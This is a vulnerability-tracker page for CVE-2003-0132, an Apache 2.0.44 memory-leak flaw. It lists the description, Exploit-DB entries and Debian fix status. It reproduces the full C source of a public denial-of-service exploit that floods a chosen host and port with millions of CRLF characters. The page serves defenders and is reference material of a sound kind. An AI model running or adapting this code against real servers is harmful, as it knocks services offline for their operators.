CVE-2003-0132

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9 dos windows verified

Matthew Murphy · 2003-04-09

Apache 2.x - Memory Leak

Source code queued for fetch — refresh in a moment.

EDB-11 dos linux verified c · 2 KB

Daniel Nystram · 2003-04-11

Apache 2.0.44 (Linux) - Remote Denial of Service

c exploit Source: Exploit-DB

/******** th-apachedos.c ********************************************************
* *
* Remote Apache DoS exploit *
* ------------------------- *
* Written as a poc for the: *
* 
* This program sends 8000000 \n's to exploit the Apache memory leak. *
* Works from scratch under Linux, as opposed to apache-massacre.c . *
* 
* 
* Daniel Nyström <exce@netwinder.nu> *
* 
* - www.telhack.tk - *
* 
******************************************************** th-apachedos.c ********/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>


int main(int argc, char *argv[])
{
int sockfd;
int count;
char buffer[8000000];
struct sockaddr_in target;
struct hostent *he;

if (argc != 3)
{
fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit.");
fprintf(stderr, "\n----------------------------------------------");
fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]);
exit(-1);
}

printf("\nTH-Apache DoS\n");
printf("-------------\n");
printf("-> Starting...\n"); 
printf("->\n");

// memset(buffer, '\n', sizeof(buffer)); /* testing */

for (count = 0; count < 8000000;) 
{
buffer[count] = '\r'; /* 0x0D */
count++;
buffer[count] = '\n'; /* 0x0A */
count++;
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname() failed ");
exit(-1);
}

memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr = *((struct in_addr *)he->h_addr);

printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
printf("->\n");

if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("socket() failed ");
exit(-1);
}

if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)
{
perror("connect() failed ");
exit(-1);
}

printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr),
atoi(argv[2]));
printf("->\n");

if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("send() failed ");
exit(-1);
close(sockfd);
} 


close(sockfd);

printf("-> Finished smoothly, check hosts apache...\n\n");
}

// milw0rm.com [2003-04-11]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.0.45`
sid	Fixed	`2.0.45`
forky	Fixed	`2.0.45`
bullseye	Fixed	`2.0.45`
bookworm	Fixed	`2.0.45`

References

https://security-tracker.debian.org/tracker/CVE-2003-0132

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.